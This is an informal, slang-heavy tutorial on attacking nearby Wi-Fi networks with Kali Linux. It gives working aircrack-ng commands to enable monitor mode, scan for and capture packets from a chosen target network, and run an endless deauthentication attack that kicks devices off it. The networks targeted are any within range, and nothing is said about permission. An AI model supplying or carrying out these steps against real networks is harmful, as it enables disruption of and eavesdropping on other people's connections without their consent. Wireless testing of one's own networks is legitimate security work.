"Kali Linux: Snatchin' Control of Nearby Wi-Fi – The G-Status Method"
So, you're looking to get a bit wavy and take a peek, maybe even get some control over the Wi-Fi networks lurkin' around, eh? This is a proper top-tier method for getting stuck in.
What you'll be needing:
A Kali Linux machine (and yeah, you'll need a USB Wi-Fi Adapter that can handle Monitor Mode and Packet Injection, no cheap stuff).
Being able to handle the Terminal like a proper shotta.
The Nitty-Gritty, Step-By-Step:
First off, plug in your USB Wi-Fi Adapter to your machine, easy.
Crack open that Terminal and get your Wi-Fi Adapter into Monitor Mode. This is bare important.
sudo airmon-ng check kill
sudo airmon-ng start wlan0
(If your adapter ain't called wlan0, swap it out for whatever yours is, fam.)
Right, now you wanna start scanning for nearby Wi-Fi networks. Get airodump-ng on it:
sudo airodump-ng wlan0mon
(Once you see some networks pop up, hit Ctrl+C to stop it. Clock the BSSID and the CH (channel) of the network you wanna target. Write 'em down.)
Now, you're gonna listen in on that target network's channel and proper capture packets.
sudo airodump-ng --bssid [BSSID] --channel [CH] --write [filename] wlan0mon
(For example, if your target's BSSID was 11:22:33:44:55:66 and it was on channel 6, you'd roll with: sudo airodump-ng --bssid 11:22:33:44:55:66 --channel 6 --write target_network wlan0mon)
This is where it gets a bit spicy. You can use those captured packets to perform a Deauthentication attack. This basically kicks devices off the network.
sudo aireplay-ng --deauth 0 -a [BSSID] wlan0mon
(You can set the number of deauth packets; 0 means it'll keep sending them non-stop, proper bare.)
Once you're done with your ting, switch off Monitor Mode and get your network manager back in the game:
sudo airmon-ng stop wlan0mon
sudo service network-manager start
